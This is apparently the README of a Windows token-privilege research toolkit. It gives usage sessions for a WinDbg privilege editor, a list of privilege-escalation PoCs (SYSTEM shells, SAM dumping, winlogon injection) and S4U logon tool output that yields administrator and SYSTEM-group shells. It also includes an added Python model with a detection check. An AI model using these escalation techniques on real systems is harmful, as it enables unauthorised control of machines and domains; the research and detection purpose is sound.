PrivFu
Kernel mode WinDbg extension and PoCs for testing how token privileges work.
There are notable repositories and articles about token privilege abuse, such as Grzegorz Tworek's Priv2Admin. The code in this repository is intended to help investigate how token privileges work.
ArtsOfGetSystem
This project covers how to get SYSTEM privileges from a high integrity level shell. See its README.md for details.
KernelWritePoCs
The purpose of this project is to investigate how attackers abuse an arbitrary kernel write vulnerability. All PoCs are written for the HackSys Extreme Vulnerable Driver. Most of them obtain a SYSTEM integrity level shell by combining the arbitrary kernel write with token privilege abuse. Tested on Windows 10 version 1809/1903; in theory they should work on most Windows 10 builds:
PoC Name | Description |
---|---|
CreateAssignTokenVariant | This PoC performs EoP with SeCreateTokenPrivilege and SeAssignPrimaryTokenPrivilege. |
CreateImpersonateTokenVariant | This PoC performs EoP with SeCreateTokenPrivilege and SeImpersonatePrivilege. |
CreateTokenVariant | This PoC performs EoP with SeCreateTokenPrivilege. |
DebugInjectionVariant | This PoC performs EoP with SeDebugPrivilege. Uses code injection into winlogon.exe at the final stage. |
DebugUpdateProcVariant | This PoC performs EoP with SeDebugPrivilege. Creates a SYSTEM process from winlogon.exe with the UpdateProcThreadAttribute API at the final stage. |
RestoreServiceModificationVariant | This PoC performs EoP with SeRestorePrivilege. Use HijackShellLib with this PoC. |
SecondaryLogonVariant | This PoC performs EoP with SeCreateTokenPrivilege and SeImpersonatePrivilege. Uses the Secondary Logon service at the final stage. |
TakeOwnershipServiceModificationVariant | This PoC performs EoP with SeTakeOwnershipPrivilege. Use HijackShellLib with this PoC. |
TcbS4uAssignTokenVariant | This PoC performs EoP with SeTcbPrivilege. Gets a System mandatory level shell from a medium mandatory level one. |
TcbS4uImpersonationVariant | This PoC performs EoP with SeTcbPrivilege. Performs thread impersonation with an S4U logon; does not get a high or system integrity level shell. |
PrivEditor
Warning
In some environments the Debug build does not work. The Release build is preferred.
PrivEditor is a kernel-mode WinDbg extension that manipulates the token privileges of a specific process. It makes it easy to set up exactly the token privilege state you want to investigate:
0: kd> .load C:\dev\PrivEditor\x64\Release\PrivEditor.dll
PrivEditor - Kernel Mode WinDbg extension for token privilege edit.
Commands :
+ !getps : List processes in target system.
+ !getpriv : List privileges of a process.
+ !addpriv : Add privilege(s) to a process.
+ !rmpriv : Remove privilege(s) from a process.
+ !enablepriv : Enable privilege(s) of a process.
+ !disablepriv : Disable privilege(s) of a process.
+ !enableall : Enable all privileges available to a process.
+ !disableall : Disable all privileges available to a process.
[*] To see command help, execute "!<Command> help" or "!<Command> /?".
getps Command
This command lists the processes in the target system:
0: kd> !getps /?
!getps - List processes in target system.
Usage : !getps [Process Name]
Process Name : (OPTIONAL) Specifies filter string for process name.
If you execute this command without any arguments, it lists all processes in the target system:
0: kd> !getps
PID nt!_EPROCESS nt!_SEP_TOKEN_PRIVILEGES Process Name
======== =================== ======================== ============
0 0xfffff805`81233630 0x00000000`00000000 Idle
4 0xffffd60f`ec068380 0xffffaf00`cec07a40 System
68 0xffffd60f`f1780480 0xffffaf00`d3b290a0 svchost.exe
88 0xffffd60f`ec0db080 0xffffaf00`cec0d080 Registry
324 0xffffd60f`ef342040 0xffffaf00`d0416080 smss.exe
348 0xffffd60f`f052f100 0xffffaf00`d25d30a0 dwm.exe
408 0xffffd60f`eca8e140 0xffffaf00`d21bd930 csrss.exe
480 0xffffd60f`f05a8340 0xffffaf00`d2568670 svchost.exe
484 0xffffd60f`efcd60c0 0xffffaf00`d06430e0 wininit.exe
500 0xffffd60f`efd130c0 0xffffaf00`d23100a0 csrss.exe
580 0xffffd60f`efdc0080 0xffffaf00`d2266630 winlogon.exe
--snip--
To look for specific processes, pass a filter string. The filter is a case-insensitive prefix match on the process name:
0: kd> !getps micro
PID nt!_EPROCESS nt!_SEP_TOKEN_PRIVILEGES Process Name
======== =================== ======================== ============
4568 0xffffd60f`f14ed080 0xffffaf00`d3db60a0 MicrosoftEdge.exe
4884 0xffffd60f`f1647080 0xffffaf00`d3fc17b0 MicrosoftEdgeCP.exe
4892 0xffffd60f`f1685080 0xffffaf00`d3fc07b0 MicrosoftEdgeSH.exe
getpriv Command
This command lists the token privileges of a specific process:
0: kd> !getpriv /?
!getpriv - List privileges of a process.
Usage : !getpriv <PID>
PID : Specifies target process ID.
Pass the target process ID in decimal:
0: kd> !getpriv 5704
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] PID : 5704
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f141e4c0
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a0c0a0
addpriv Command
This command adds token privilege(s) to a specific process:
0: kd> !addpriv /?
!addpriv - Add privilege(s) to a process.
Usage : !addpriv <PID> <Privilege>
PID : Specifies target process ID.
Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.
+ CreateToken : SeCreateTokenPrivilege.
+ AssignPrimaryToken : SeAssignPrimaryTokenPrivilege.
+ LockMemory : SeLockMemoryPrivilege.
+ IncreaseQuota : SeIncreaseQuotaPrivilege.
+ MachineAccount : SeMachineAccountPrivilege.
+ Tcb : SeTcbPrivilege.
+ Security : SeSecurityPrivilege.
+ TakeOwnership : SeTakeOwnershipPrivilege.
+ LoadDriver : SeLoadDriverPrivilege.
+ SystemProfile : SeSystemProfilePrivilege.
+ Systemtime : SeSystemtimePrivilege.
+ ProfileSingleProcess : SeProfileSingleProcessPrivilege.
+ IncreaseBasePriority : SeIncreaseBasePriorityPrivilege.
+ CreatePagefile : SeCreatePagefilePrivilege.
+ CreatePermanent : SeCreatePermanentPrivilege.
+ Backup : SeBackupPrivilege.
+ Restore : SeRestorePrivilege.
+ Shutdown : SeShutdownPrivilege.
+ Debug : SeDebugPrivilege.
+ Audit : SeAuditPrivilege.
+ SystemEnvironment : SeSystemEnvironmentPrivilege.
+ ChangeNotify : SeChangeNotifyPrivilege.
+ RemoteShutdown : SeRemoteShutdownPrivilege.
+ Undock : SeUndockPrivilege.
+ SyncAgent : SeSyncAgentPrivilege.
+ EnableDelegation : SeEnableDelegationPrivilege.
+ ManageVolume : SeManageVolumePrivilege.
+ Impersonate : SeImpersonatePrivilege.
+ CreateGlobal : SeCreateGlobalPrivilege.
+ TrustedCredManAccess : SeTrustedCredManAccessPrivilege.
+ Relabel : SeRelabelPrivilege.
+ IncreaseWorkingSet : SeIncreaseWorkingSetPrivilege.
+ TimeZone : SeTimeZonePrivilege.
+ CreateSymbolicLink : SeCreateSymbolicLinkPrivilege.
+ DelegateSessionUserImpersonate : SeDelegateSessionUserImpersonatePrivilege.
+ All : All privileges.
For example, to add SeDebugPrivilege to a specific process, pass the target process ID as the first argument and the short privilege name `debug` (as listed in the help message) as the second argument. Note that a newly added privilege is present but still disabled:
0: kd> !getpriv 5704
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] PID : 5704
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f141e4c0
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a0c0a0
0: kd> !addpriv 5704 debug
[>] Trying to add SeDebugPrivilege.
[*] Done.
0: kd> !getpriv 5704
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeDebugPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] PID : 5704
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f141e4c0
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a0c0a0
The privilege name argument is case insensitive. To add all token privileges at once, pass `all` as the privilege name:
0: kd> !addpriv 5704 all
[>] Trying to add all privileges.
[*] Done.
0: kd> !getpriv 5704
Privilege Name State
========================================== ========
SeCreateTokenPrivilege Disabled
SeAssignPrimaryTokenPrivilege Disabled
SeLockMemoryPrivilege Disabled
SeIncreaseQuotaPrivilege Disabled
SeMachineAccountPrivilege Disabled
SeTcbPrivilege Disabled
SeSecurityPrivilege Disabled
--snip--
rmpriv Command
This command removes token privilege(s) from a specific process:
0: kd> !rmpriv /?
!rmpriv - Remove privilege(s) from a process.
Usage : !rmpriv <PID> <Privilege>
PID : Specifies target process ID.
Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.
+ CreateToken : SeCreateTokenPrivilege.
+ AssignPrimaryToken : SeAssignPrimaryTokenPrivilege.
+ LockMemory : SeLockMemoryPrivilege.
--snip--
If you want to remove SeChangeNotifyPrivilege, execute this command as follows:
0: kd> !getpriv 352
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] PID : 352
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d3468770
0: kd> !rmpriv 352 changenotify
[>] Trying to remove SeChangeNotifyPrivilege.
[*] Done.
0: kd> !getpriv 352
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] PID : 352
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d3468770
As with the `!addpriv` command, you can remove all token privileges at once by passing `all` as the privilege name:
0: kd> !rmpriv 352 all
[>] Trying to remove all privileges.
[*] Done.
0: kd> !getpriv 352
Privilege Name State
========================================== ========
[*] PID : 352
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d3468770
enablepriv Command
This command enables token privilege(s) of a specific process:
0: kd> !enablepriv /?
!enablepriv - Enable privilege(s) of a process.
Usage : !enablepriv <PID> <Privilege>
PID : Specifies target process ID.
Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.
+ CreateToken : SeCreateTokenPrivilege.
+ AssignPrimaryToken : SeAssignPrimaryTokenPrivilege.
+ LockMemory : SeLockMemoryPrivilege.
--snip--
The first argument is for process ID, and the second is for token privilege name:
0: kd> !getpriv 1932
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] PID : 1932
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0
0: kd> !enablepriv 1932 timezone
[>] Trying to enable SeTimeZonePrivilege.
[*] Done.
0: kd> !getpriv 1932
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Enabled
[*] PID : 1932
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0
If you try to enable a privilege that is not yet present in the token, this command adds it automatically before enabling it:
0: kd> !getpriv 1932
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Enabled
[*] PID : 1932
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0
0: kd> !enablepriv 1932 debug
[*] SeDebugPrivilege is not present.
[>] Trying to add SeDebugPrivilege.
[>] Trying to enable SeDebugPrivilege.
[*] Done.
0: kd> !getpriv 1932
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeDebugPrivilege Enabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Enabled
[*] PID : 1932
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0
disablepriv Command
This command disables token privilege(s) of a specific process:
0: kd> !disablepriv /?
!disablepriv - Disable privilege(s) of a process.
Usage : !disablepriv <PID> <Privilege>
PID : Specifies target process ID.
Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.
+ CreateToken : SeCreateTokenPrivilege.
+ AssignPrimaryToken : SeAssignPrimaryTokenPrivilege.
+ LockMemory : SeLockMemoryPrivilege.
--snip--
To use this command, set a target process ID for the first argument and token privilege name for the second argument:
0: kd> !getpriv 1932
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeDebugPrivilege Enabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Enabled
[*] PID : 1932
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0
0: kd> !disablepriv 1932 debug
[>] Trying to disable SeDebugPrivilege.
[*] Done.
0: kd> !getpriv 1932
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeDebugPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Enabled
[*] PID : 1932
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0
enableall Command
This command enables all token privileges present in a specific process's token:
0: kd> !enableall /?
!enableall - Enable all privileges available to a process.
Usage : !enableall <PID>
PID : Specifies target process ID.
It works as follows:
0: kd> !getpriv 3792
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Disabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
[*] PID : 3792
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd507`aaed9080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0
0: kd> !enableall 3792
[>] Trying to enable all available privileges.
[*] Done.
0: kd> !getpriv 3792
Privilege Name State
========================================== ========
SeShutdownPrivilege Enabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Enabled
SeIncreaseWorkingSetPrivilege Enabled
[*] PID : 3792
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd507`aaed9080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0
disableall Command
This command disables all token privileges of a specific process:
0: kd> !disableall /?
!disableall - Disable all privileges available to a process.
Usage : !disableall <PID>
PID : Specifies target process ID.
This command is equivalent to `!disablepriv <PID> all`. It works as follows:
0: kd> !getpriv 3792
Privilege Name State
========================================== ========
SeShutdownPrivilege Enabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Enabled
SeIncreaseWorkingSetPrivilege Enabled
[*] PID : 3792
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd507`aaed9080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0
0: kd> !disableall 3792
[>] Trying to disable all available privileges.
[*] Done.
0: kd> !getpriv 3792
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Disabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
[*] PID : 3792
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd507`aaed9080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0
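All of the PrivEditor commands above rewrite the same kernel structure, nt!_SEP_TOKEN_PRIVILEGES, whose address `!getps` and `!getpriv` print. It holds three 64-bit bitmasks (Present, Enabled, EnabledByDefault) with privilege LUID N at bit `1 << N`; the LUID values run from 2 (SeCreateTokenPrivilege) to 36 (SeDelegateSessionUserImpersonatePrivilege) in exactly the order the `!addpriv` help text lists them. The following Python model is an added example and is not code from the PrivFu repository: it replays the `!addpriv 5704 debug` session on a copy of the page's cmd.exe baseline, implements each command as the corresponding bit operation, and adds a defender-side check that flags Present bits a medium-IL process should not carry, which is also the footprint the KernelWritePoCs leave when they patch this structure. The baseline token values are copied from the page's own `!getpriv` output; the class and function names are this example's own, not the extension's.

```python
"""Model of nt!_SEP_TOKEN_PRIVILEGES and of what the PrivEditor commands do to it.

Added example for this page; it is not code from the PrivFu repository.
The layout (three 64-bit masks: Present, Enabled, EnabledByDefault, with
privilege N at bit 1 << N) and the privilege LUID values 2..36, in the order
PrivEditor's help text lists them, are the real Windows definitions. The
cmd.exe baseline is copied from the page's own !getpriv output; there is no
live kernel here, only the structure as it would sit in memory.
"""
from dataclasses import dataclass

# Short names in LUID order: index 0 is LUID 2 (SeCreateTokenPrivilege).
_SHORT_NAMES = [
    "CreateToken", "AssignPrimaryToken", "LockMemory", "IncreaseQuota",
    "MachineAccount", "Tcb", "Security", "TakeOwnership", "LoadDriver",
    "SystemProfile", "Systemtime", "ProfileSingleProcess",
    "IncreaseBasePriority", "CreatePagefile", "CreatePermanent", "Backup",
    "Restore", "Shutdown", "Debug", "Audit", "SystemEnvironment",
    "ChangeNotify", "RemoteShutdown", "Undock", "SyncAgent",
    "EnableDelegation", "ManageVolume", "Impersonate", "CreateGlobal",
    "TrustedCredManAccess", "Relabel", "IncreaseWorkingSet", "TimeZone",
    "CreateSymbolicLink", "DelegateSessionUserImpersonate",
]
LUID = {name.lower(): 2 + i for i, name in enumerate(_SHORT_NAMES)}
FULL_NAME = {2 + i: f"Se{name}Privilege" for i, name in enumerate(_SHORT_NAMES)}
ALL_MASK = sum(1 << luid for luid in FULL_NAME)


@dataclass
class SepTokenPrivileges:
    """In-memory stand-in for nt!_SEP_TOKEN_PRIVILEGES (three ULONGLONGs)."""
    present: int = 0
    enabled: int = 0
    enabled_by_default: int = 0

    def listing(self):
        """Rows as !getpriv prints them: Present privileges in ascending LUID order."""
        rows = []
        for luid in sorted(FULL_NAME):
            bit = 1 << luid
            if self.present & bit:
                state = "Enabled" if self.enabled & bit else "Disabled"
                rows.append((FULL_NAME[luid], state))
        return rows


def _mask(privilege):
    """Map PrivEditor's case-insensitive short name (or 'all') to a bitmask."""
    key = privilege.lower()
    if key == "all":
        return ALL_MASK
    if key not in LUID:
        raise ValueError(f"unknown privilege: {privilege}")
    return 1 << LUID[key]


def addpriv(tp, privilege):            # !addpriv: set Present only; stays Disabled
    tp.present |= _mask(privilege)

def rmpriv(tp, privilege):             # !rmpriv: clear the bit in all three masks
    m = _mask(privilege)
    tp.present &= ~m
    tp.enabled &= ~m
    tp.enabled_by_default &= ~m

def enablepriv(tp, privilege):         # !enablepriv: adds the privilege if absent
    m = _mask(privilege)
    tp.present |= m
    tp.enabled |= m

def disablepriv(tp, privilege):        # !disablepriv: clear Enabled, keep Present
    tp.enabled &= ~_mask(privilege)

def enableall(tp):                     # !enableall: Enabled := Present
    tp.enabled = tp.present

def disableall(tp):                    # !disableall == !disablepriv <PID> all
    tp.enabled = 0


# Baseline copied from the page's medium-IL cmd.exe: five Present, ChangeNotify Enabled.
MEDIUM_IL_CMD = SepTokenPrivileges(
    present=_mask("shutdown") | _mask("changenotify") | _mask("undock")
    | _mask("increaseworkingset") | _mask("timezone"),
    enabled=_mask("changenotify"),
    enabled_by_default=_mask("changenotify"),
)


def unexpected_privileges(tp, baseline=MEDIUM_IL_CMD):
    """Present bits that a process with this baseline should never carry.

    A medium-IL process whose Present mask grew (e.g. SeDebugPrivilege) is the
    footprint of !addpriv or of an arbitrary kernel write into this structure.
    """
    extra = tp.present & ~baseline.present
    return [FULL_NAME[luid] for luid in sorted(FULL_NAME) if extra & (1 << luid)]


def demo():
    """Replay the page's '!addpriv 5704 debug' session on a copy of the baseline."""
    tp = SepTokenPrivileges(**vars(MEDIUM_IL_CMD))
    addpriv(tp, "debug")
    return tp


if __name__ == "__main__":
    for name, state in demo().listing():
        print(f"{name:<42} {state}")
    print("unexpected:", unexpected_privileges(demo()))
```

Reading the three QWORDs with `dt nt!_SEP_TOKEN_PRIVILEGES <address>` and feeding them to `SepTokenPrivileges(present, enabled, enabled_by_default)` gives the same listing `!getpriv` prints, which is a quick way to check what a kernel-write PoC actually changed. The `unexpected_privileges` check is the point a defender cares about: user-mode APIs cannot grow the Present mask, so extra Present bits on a medium-IL process can only come from the kernel side.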
PrivilegedOperations
This project contains PoCs for sensitive token privileges such as SeDebugPrivilege. Currently, PoCs for only a subset of them have been released.
Program Name | Description |
---|---|
SeAuditPrivilegePoC | This PoC tries to create new security event(s) with SeAuditPrivilege. SeAuditPrivilege does not require a high integrity level, but this PoC requires administrative privileges on its first execution to install a new event source. Additionally, confirming the result may require changing the local security policy. |
SeBackupPrivilegePoC | This PoC tries to dump HKLM\SAM with SeBackupPrivilege. |
SeCreatePagefilePrivilegePoC | This PoC tries to set the pagefile option to specific values with SeCreatePagefilePrivilege. |
SeCreateTokenPrivilegePoC | This PoC tries to create an elevated token with SeCreateTokenPrivilege. |
SeDebugPrivilegePoC | This PoC tries to open a handle to winlogon.exe with SeDebugPrivilege. |
SeRestorePrivilegePoC | This PoC tries to write a test file into C:\Windows\System32\ with SeRestorePrivilege. |
SeSecurityPrivilegePoC | This PoC tries to read the latest security event with SeSecurityPrivilege. |
SeShutdownPrivilegePoC | This PoC tries to cause a BSOD with SeShutdownPrivilege. |
SeSystemEnvironmentPrivilegePoC | This PoC tries to enumerate system environment variables with SeSystemEnvironmentPrivilege. Works on UEFI-based systems only. Because of an OS limitation, this PoC does not work on OSes earlier than Windows 10 build 1809. |
SeTakeOwnershipPrivilegePoC | This PoC tries to change the owner of HKLM:\SYSTEM\CurrentControlSet\Services\dmwappushservice to the calling user account with SeTakeOwnershipPrivilege. |
SeTcbPrivilegePoC | This PoC tries to perform an S4U logon to become a member of Builtin\Backup Operators with SeTcbPrivilege. |
SeTrustedCredManAccessPrivilegePoC | This PoC tries to access a DPAPI blob with SeTrustedCredManAccessPrivilege. |
S4uDelegator
This tool performs an S4U logon with SeTcbPrivilege. Administrative privileges are required to use it. Currently only a few operations are implemented (more will be added in the future):
C:\dev>S4uDelegator.exe -h
S4uDelegator - Tool for S4U Logon.
Usage: S4uDelegator.exe [Options]
-h, --help : Displays this help message.
-m, --module : Specifies module name.
Available Modules:
+ lookup - Lookup account's SID.
+ shell - Perform S4U logon and get shell.
[*] To see help for each modules, specify "-m <Module> -h" as arguments.
[!] -m option is required.
lookup Module
This module looks up an account's SID:
C:\dev>S4uDelegator.exe -m lookup -d contoso -u david
[*] Result:
|-> Account Name : CONTOSO\david
|-> SID : S-1-5-21-3654360273-254804765-2004310818-1104
|-> Account Type : SidTypeUser
C:\dev>S4uDelegator.exe -m lookup -s S-1-5-21-3654360273-254804765-2004310818-500
[*] Result:
|-> Account Name : CONTOSO\Administrator
|-> SID : S-1-5-21-3654360273-254804765-2004310818-500
|-> Account Type : SidTypeUser
C:\dev>S4uDelegator.exe -m lookup -d contoso -u "domain admins"
[*] Result:
|-> Account Name : CONTOSO\Domain Admins
|-> SID : S-1-5-21-3654360273-254804765-2004310818-512
|-> Account Type : SidTypeGroup
If you don't specify a domain name with the `-d` option, the local computer name is used as the domain:
C:\dev>hostname
CL01
C:\dev>S4uDelegator.exe -m lookup -u admin
[*] Result:
|-> Account Name : CL01\admin
|-> SID : S-1-5-21-2659926013-4203293582-4033841475-500
|-> Account Type : SidTypeUser
shell Module
This module performs an S4U logon and spawns an interactive shell under the resulting token:
C:\dev>whoami /user
USER INFORMATION
----------------
User Name SID
============= =============================================
contoso\david S-1-5-21-3654360273-254804765-2004310818-1104
C:\dev>S4uDelegator.exe -m shell -u admin
[>] Target account to S4U:
|-> Account Name : CL01\admin
|-> Account Sid : S-1-5-21-2659926013-4203293582-4033841475-500
|-> Account Type : SidTypeUser
|-> User Principal Name : (NULL)
[>] Trying to get SYSTEM.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to impersonate as smss.exe.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
|-> Current Thread ID : 7140
[+] Impersonation is successful.
[>] Trying to MSV S4U logon.
[+] S4U logon is successful.
[>] Trying to create a token assigned process.
Microsoft Windows [Version 10.0.18362.175]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\dev>whoami /user
USER INFORMATION
----------------
User Name SID
========== =============================================
cl01\admin S-1-5-21-2659926013-4203293582-4033841475-500
To add extra groups to the S4U token, pass comma-separated SIDs with the `-e` option:
C:\Tools>whoami
contoso\david
C:\Tools>S4uDelegator.exe -m shell -d contoso -u administrator -e s-1-5-18,S-1-5-19
[>] Target account to S4U:
|-> Account Name : CONTOSO\administrator
|-> Account Sid : S-1-5-21-3654360273-254804765-2004310818-500
|-> Account Type : SidTypeUser
|-> User Principal Name : [email protected]
[>] Group SID to add:
|-> [VALID] NT AUTHORITY\SYSTEM (SID : S-1-5-18) will be added.
|-> [VALID] NT AUTHORITY\LOCAL SERVICE (SID : S-1-5-19) will be added.
[>] Trying to get SYSTEM.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to impersonate as smss.exe.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[+] SeIncreaseQuotaPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
|-> Current Thread ID : 2660
[+] Impersonation is successful.
[>] Trying to Kerberos S4U logon.
[+] S4U logon is successful.
[>] Trying to create a token assigned process.
Microsoft Windows [Version 10.0.18362.175]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Tools>whoami
contoso\administrator
C:\Tools>whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================== ================ ============================================ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SYSTEM Well-known group S-1-5-18 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\LOCAL SERVICE Well-known group S-1-5-19 Mandatory group, Enabled by default, Enabled group
CONTOSO\Group Policy Creator Owners Group S-1-5-21-3654360273-254804765-2004310818-520 Mandatory group, Enabled by default, Enabled group
CONTOSO\Domain Admins Group S-1-5-21-3654360273-254804765-2004310818-512 Mandatory group, Enabled by default, Enabled group
CONTOSO\Schema Admins Group S-1-5-21-3654360273-254804765-2004310818-518 Mandatory group, Enabled by default, Enabled group
CONTOSO\Enterprise Admins Group S-1-5-21-3654360273-254804765-2004310818-519 Mandatory group, Enabled by default, Enabled group
Service asserted identity Well-known group S-1-18-2 Mandatory group, Enabled by default, Enabled group
CONTOSO\Denied RODC Password Replication Group Alias S-1-5-21-3654360273-254804765-2004310818-572 Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\System Mandatory Level Label S-1-16-16384
SwitchPriv
This tool enables, disables or removes specific token privileges for a process:
C:\dev>SwitchPriv.exe -h
SwitchPriv - Tool to control token privileges.
Usage: SwitchPriv.exe [Options]
-h, --help : Displays this help message.
-e, --enable : Specifies token privilege to enable. Case insensitive.
-d, --disable : Specifies token privilege to disable. Case insensitive.
-r, --remove : Specifies token privilege to remove. Case insensitive.
-f, --find : Specifies token privilege to find.
-p, --pid : Specifies the target PID. Default specifies PPID.
-i, --integrity : Specifies integrity level to set.
-g, --get : Flag to get available privileges for the target process.
-s, --system : Flag to run as "NT AUTHORITY\SYSTEM".
-l, --list : Flag to list values for --enable, --disable, --remove and --integrity options.
To list the values accepted by the `--enable`, `--disable`, `--remove` and `--integrity` options, run the tool with the `--list` flag:
C:\dev>SwitchPriv.exe -l
Available values for --enable, --disable, and --remove options:
+ CreateToken : Specifies SeCreateTokenPrivilege.
+ AssignPrimaryToken : Specifies SeAssignPrimaryTokenPrivilege.
+ LockMemory : Specifies SeLockMemoryPrivilege.
+ IncreaseQuota : Specifies SeIncreaseQuotaPrivilege.
+ MachineAccount : Specifies SeMachineAccountPrivilege.
+ Tcb : Specifies SeTcbPrivilege.
+ Security : Specifies SeSecurityPrivilege.
+ TakeOwnership : Specifies SeTakeOwnershipPrivilege.
+ LoadDriver : Specifies SeLoadDriverPrivilege.
--snip--
Available values for --integrity option:
+ 0 : UNTRUSTED_MANDATORY_LEVEL
+ 1 : LOW_MANDATORY_LEVEL
+ 2 : MEDIUM_MANDATORY_LEVEL
+ 3 : MEDIUM_PLUS_MANDATORY_LEVEL
+ 4 : HIGH_MANDATORY_LEVEL
+ 5 : SYSTEM_MANDATORY_LEVEL
+ 6 : PROTECTED_MANDATORY_LEVEL
+ 7 : SECURE_MANDATORY_LEVEL
To control privileges of another process, specify the target PID. For example, to enable SeUndockPrivilege for PID 6968, run the tool with the `--enable` option:
C:\dev>SwitchPriv.exe -p 6968 -e undock
